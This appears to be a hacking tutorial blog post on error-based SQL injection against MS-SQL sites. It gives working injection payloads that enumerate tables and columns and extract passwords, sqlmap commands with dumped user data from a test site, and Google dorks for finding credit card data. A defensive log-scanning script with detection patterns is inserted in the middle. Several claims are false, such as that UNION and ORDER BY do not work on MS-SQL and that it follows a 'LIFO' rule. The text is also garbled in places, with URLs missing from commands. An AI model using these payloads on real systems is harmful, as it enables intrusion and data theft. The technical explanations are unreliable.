Error Based Injection

January 18, 2018 | Views: 4409


Error-based injection is mainly concentrated on Microsoft-powered technologies such as ASP and ASPX. It works against MS-SQL databases and is a bit different from the previous attack, union-based injection, which was deployed against MySQL databases.

• Here the database will be MS-SQL




MS-SQL :  .asp or .aspx


Differences between Union-Based and Error-Based Injection

1.  Extracting all tables at one time from the database

•  information_schema.tables will not return the entire list of table names.


2.   MS-SQL works on the STACK principle, meaning LAST IN, FIRST OUT.

• Hence the table on top of the stack is the one fetched first at extraction time.


3.  Functions like database() and version() do not work in MS-SQL.


4.  “order by” or “union” do not work on MS-SQL.




• It is a legal platform provided by Acunetix for security testing.


Step 1: Find any GET-method parameter in the URL of the website.

• We have to look for any something=something pair.

• E.g. Id=1 or pid=16 or product=milk


Step 2: Check the exception handling: '


Step 3: Check the conditions required for further attack: and 1=0;


Note: Error-based injection works on the LIFO rule: last in, first out.


For example, if we have a database with tables like the following:

threads -> 1






Step 4:

and 1=convert(int,(select top 1 table_name from information_schema.tables));

• Got Table :  'threads' X

and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('threads')));

• Target : ‘users’


Step 5: Get the respective columns of the users table

and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users' and column_name not in ('uname')));

• Target Column : uname, upass


Step 6: Get the uname and upass

and 1=convert(int,(select top 1 upass from users));

• uname:admin

• upass: none
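
Seen from the defender's side, the probes in Steps 2 to 6 leave recognisable query strings in the web server log. The following is an added example, not part of the original article: a small log scanner that flags those payload shapes and notes whether the server answered with an unhandled error. The log layout, the /product.aspx page, the IP addresses and the meaning given to status 500 are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Common/combined log format; only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

# Payload shapes taken from Steps 2 to 6 of the article.
RULES = [
    ("dangling-quote", re.compile(r"^\w*'$")),
    ("boolean-probe", re.compile(r"\band 1 ?= ?[01]\b", re.I)),
    ("convert-subquery", re.compile(r"convert ?\( ?int ?, ?\( ?select\b", re.I)),
    ("schema-enumeration", re.compile(r"information_schema ?\. ?(tables|columns)", re.I)),
]

def scan_line(line):
    """Return a finding for a log line that carries an injection probe, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    hits = []
    # parse_qsl percent-decodes each value and turns '+' into a space.
    for name, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        text = re.sub(r"\s+", " ", value).strip()
        hits += [(name, rule) for rule, pattern in RULES if pattern.search(text)]
    if not hits:
        return None
    # Assumption: status 500 means the application did not handle the database
    # error, which is the condition this technique needs in order to leak data.
    return {"ip": m["ip"], "hits": hits, "error_returned": m["status"] == "500"}

def scan(lines):
    """Scan many log lines and keep only the findings."""
    return [finding for finding in map(scan_line, lines) if finding]

# Constructed sample log (documentation IP ranges, hypothetical /product.aspx page).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Jan/2018:09:50:01 +0000] "GET /product.aspx?id=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [18/Jan/2018:09:51:12 +0000] "GET /product.aspx?id=1%27 HTTP/1.1" 500 3021',
    '198.51.100.7 - - [18/Jan/2018:09:51:40 +0000] "GET /product.aspx?id=1+and+1=0 HTTP/1.1" 200 812',
    '198.51.100.7 - - [18/Jan/2018:09:52:03 +0000] "GET /product.aspx?id=1+and+1=convert(int,'
    '(select+top+1+table_name+from+information_schema.tables)) HTTP/1.1" 500 3187',
    '198.51.100.7 - - [18/Jan/2018:09:53:30 +0000] "GET /product.aspx?id=1+and+1=convert(int,'
    '(select+top+1+upass+from+users)) HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with error_returned set to True is the one to act on first: it marks a request where the database error reached the response path, so the page should move to parameterized queries and generic error pages.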


Stack Based Query


1.   SQLMAP : it's a Python-script-based automated vulnerability assessment and penetration testing tool.

2.   Kali Linux : sqlmap is built into Kali Linux

• You can also download the sqlmap version for Windows from its official website.


Introduction to SQL MAP


Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.


Step 1: Open Your Linux Terminal

Step 2: python sqlmap -u --dbs


Here we can see that we got the databases below.

[09:54:16] [INFO] fetching database names

Available databases [2]:

[*] acuart <——- Target Database

[*] information_schema

Step 3: Get the tables of the database

python sqlmap -u -D acuart --tables

Here we got all the tables available in the acuart database.


[09:58:49] [INFO] fetching tables for database: ‘acuart’

Database: acuart

[8 tables]


| artists   |

| carts     |

| categ     |

| featured  |

| guestbook |

| pictures  |

| products  |

| users     |——-> Target Table






Step 4: Get the columns of the users table

python sqlmap -u -T users --columns


Database: acuart

Table: users

[8 columns]


| Column  | Type         |


| address | mediumtext   |

| cart    | varchar(100) |

| cc      | varchar(100) |

| email   | varchar(100) |

| name    | varchar(100) |

| pass    | varchar(100) |—> Target

| phone   | varchar(100) |

| uname   | varchar(100) |—> Target


Step 5: Get the data from the columns of the above table.

python sqlmap -u -U test -T users --dump


Database: acuart

Table: users

[1 entry]


| cc                        | name         | cart                             | pass | uname | phone   | email              | address |


| De nave queimando asfalto | Hiago Junior | a929b42ddb394d84a486976ac5782afc | test | test  | 2323345 | | foda-se |



Google Hacking Database

Johnny I Hack Stuff : Searched –> Google –> Credit Cards

• Google Dorks

Filtering of results from the Google database.

#inurl  — Green Line in Google Search

#intitle – Blue Line in Google Search

#intext – Black Line in Google Search

#filetype – Type of file that we needed i.e. pdf, ppt, docs etc


Searching tools

1 Comment
  1. Guy is very vague in his steps. Would be really helpful if you took your time and went through the steps instead of assuming the user knows what you’re doing. It won’t hurt the experienced users but it sure will help the novice ones.
